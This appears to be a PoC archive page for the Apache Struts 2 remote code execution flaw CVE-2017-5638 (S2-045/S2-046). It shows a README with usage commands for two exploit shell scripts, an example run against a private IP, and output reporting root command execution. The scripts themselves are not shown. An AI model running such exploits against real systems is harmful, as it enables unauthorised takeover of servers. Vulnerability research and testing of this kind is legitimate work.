CVE-2017-5638 PoC — Apache Struts 2 输入验证错误漏洞

Source

Associated Vulnerability

Description

S2-046|S2-045: Struts 2 Remote Code Execution vulnerability（CVE-2017-5638）

Readme

# S2-046_POC
##  Usage:
    ./s2_046.sh [url]
    ./s2_045.sh [url]
    
##  Sample:
  
  1. chmod +x ./s2_046.sh       
  2. ./s2_046.sh http://172.16.152.135/index.action
    
##  OUTPUT:
    ================HTTP GET Method================
    uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023
    uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023
    ================HTTP POST Method================
    uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023
    uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023

File Snapshot

 [4.0K]  /data/pocs/26d6b1ed2a79360dfb57306c7a7bec4b74942fcf
├── [ 735]  README.md
├── [1.5K]  s2_045.sh
└── [1.9K]  s2_046.sh

0 directories, 3 files

Remarks